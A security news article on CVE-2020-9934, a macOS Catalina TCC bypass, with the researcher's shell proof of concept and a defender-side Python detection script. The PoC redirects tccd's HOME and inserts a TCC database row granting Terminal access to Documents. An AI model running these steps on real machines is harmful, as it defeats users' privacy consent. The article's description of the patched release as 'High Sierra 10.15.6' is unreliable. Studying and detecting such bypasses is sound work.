Apple’s macOS 10.15.5 TCC Framework bug allowed any hacker to access confidential user data


Apple macOS Catalina 10.15.5 CVE-2020-9934 Transparency, Consent, and Control (TCC) Framework vulnerability allowed unauthorized access to sensitive user data

Security researcher Matt Shockley has discovered a TCC Framework vulnerability in Apple’s macOS Catalina 10.15.5 which could have allowed an unauthorized hacker to access sensitive user data. The vulnerability has since been patched in Apple macOS High Sierra 10.15.6.

The Transparency, Consent, and Control (TCC) Framework vulnerability was issued a unique identifier, CVE-2020-9934, and had a severity score of 4/10. The vulnerability was so simple to execute that it didn’t require proficient hacking or programming knowledge.

Transparency, Consent, and Control (TCC) Framework vulnerability CVE-2020-9934 in macOS Catalina

The Transparency, Consent, and Control (TCC) Framework is an Apple subsystem which denies installed applications access to ‘sensitive’ user data without explicit permission from the user (generally in the form of a pop-up message). Though the TCC Framework exists on both macOS and iOS, Shockley found that the bug could only be exploited on the macOS version.

If an application attempts to access files in a directory protected by TCC without user authorization, the file operation will fail. However, Shockley found that TCC can be manipulated into believing an application has already been granted permission, which allows a local user to access the Mac owner’s confidential information.

Shockley found that since the TCC daemon is started by launchd within the current user’s domain, he could also control all environment variables passed to it at launch. He set the $HOME environment variable in launchctl to point to a directory under his control and restarted the TCC daemon. Once the TCC daemon restarted, it read its database from that directory, so he could directly modify the TCC database to grant himself access rights without the user’s knowledge.

Shockley says that the bug works because it doesn’t actually modify the SIP-protected TCC database. It only exploits the daemon’s handling of environment variables, so that tccd consults a database in a directory the attacker controls.

Proof of Concept for CVE-2020-9934

# reset database just in case (no cheating!)
$> tccutil reset All
# mimic TCC's directory structure from ~/Library
$> mkdir -p "/tmp/tccbypass/Library/Application Support/com.apple.TCC"
# cd into the new directory
$> cd "/tmp/tccbypass/Library/Application Support/com.apple.TCC/"
# set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass
# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd
# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db "INSERT INTO access
VALUES('kTCCServiceSystemPolicyDocumentsFolder',
'com.apple.Terminal', 0, 1, 1,
X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',
NULL,
NULL,
'UNUSED',
NULL,
NULL,
1333333333333337);"
# list Documents directory without prompting the end user
$> ls ~/Documents
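The two conditions the PoC relies on are observable from the defender’s side: launchd’s HOME value no longer matching the account’s real home directory, and a hand-inserted access row whose last_modified value is not a plausible timestamp (the PoC writes 1333333333333337, which is far in the future). The following script is an added example written for this article, not Shockley’s code or Apple’s tooling; it checks both conditions. The access table schema it creates for its constructed sample database is a simplified version assumed from the column order used in the PoC’s INSERT statement, and the live path check only runs when launchctl is available.

```python
"""Defender-side checks for the CVE-2020-9934 pattern (added example, not the article's PoC)."""
import os
import pwd
import sqlite3
import subprocess
import tempfile
import time


def launchd_home():
    """Return the HOME value launchd passes to user-domain services such as tccd,
    or None when launchctl is unavailable (e.g. when run on a non-macOS host)."""
    try:
        out = subprocess.run(["launchctl", "getenv", "HOME"],
                             capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return out.stdout.strip() or None


def home_mismatch(launchd_value, real_home):
    """True when launchd's HOME points somewhere other than the account's real home
    directory. That is the precondition of the bypass: tccd would then open
    $HOME/Library/Application Support/com.apple.TCC/TCC.db under an attacker-chosen path."""
    if launchd_value is None:
        return False
    return os.path.realpath(launchd_value) != os.path.realpath(real_home)


def suspicious_rows(db_path, now=None, max_skew=86400):
    """Return access rows whose last_modified is not a plausible epoch-seconds value:
    missing, more than max_skew seconds in the future, or earlier than 2011 (before
    TCC shipped). Rows written by a human with sqlite3 tend to fail this check."""
    now = time.time() if now is None else now
    con = sqlite3.connect(db_path)
    try:
        rows = con.execute(
            "SELECT service, client, allowed, last_modified FROM access").fetchall()
    finally:
        con.close()
    return [r for r in rows
            if r[3] is None or r[3] > now + max_skew or r[3] < 1_300_000_000]


def build_sample_db(db_path):
    """Create a constructed TCC-like database (assumed, simplified schema) with one
    normally granted row and the row from the PoC above."""
    con = sqlite3.connect(db_path)
    con.execute("""CREATE TABLE access (
        service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,
        allowed INTEGER NOT NULL, prompt_count INTEGER NOT NULL, csreq BLOB,
        policy_id INTEGER, indirect_object_identifier_type INTEGER,
        indirect_object_identifier TEXT NOT NULL DEFAULT 'UNUSED',
        indirect_object_code_identity BLOB, flags INTEGER, last_modified INTEGER NOT NULL)""")
    con.executemany("INSERT INTO access VALUES (?,?,?,?,?,?,?,?,?,?,?,?)", [
        # plausible entry granted through the normal prompt (constructed sample)
        ("kTCCServiceSystemPolicyDocumentsFolder", "com.example.editor",
         0, 1, 1, None, None, None, "UNUSED", None, None, 1_590_000_000),
        # the row inserted by the PoC: last_modified is not a sane timestamp
        ("kTCCServiceSystemPolicyDocumentsFolder", "com.apple.Terminal",
         0, 1, 1, None, None, None, "UNUSED", None, None, 1333333333333337),
    ])
    con.commit()
    con.close()


def demo():
    """Audit the constructed sample database; returns the flagged rows."""
    db = os.path.join(tempfile.mkdtemp(), "TCC.db")
    build_sample_db(db)
    return suspicious_rows(db, now=1_600_000_000)


if __name__ == "__main__":
    real_home = pwd.getpwuid(os.getuid()).pw_dir
    lh = launchd_home()
    print("launchd HOME:", lh, "| mismatch:", home_mismatch(lh, real_home))
    live_db = os.path.join(real_home, "Library", "Application Support",
                           "com.apple.TCC", "TCC.db")
    if os.path.exists(live_db):
        print("suspicious live rows:", suspicious_rows(live_db))
    print("suspicious sample rows:", demo())
```

Reading the live user TCC.db requires Full Disk Access for the terminal that runs the script; the sample audit works anywhere. A row with a sane timestamp that was still inserted by hand will not be caught by the timestamp heuristic, so the HOME mismatch check is the more reliable of the two signals.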

Shockley has published a Swift write-up of the PoC on his GitHub. Shockley informed the Apple security team about the vulnerability on 26 Feb 2020, and Apple released macOS High Sierra version 10.15.6 on 15 Jul 2020 to patch this simple yet powerful environment variable flaw.

PCs and laptops still running Apple’s macOS Catalina 10.15.5 remain vulnerable to this bug.
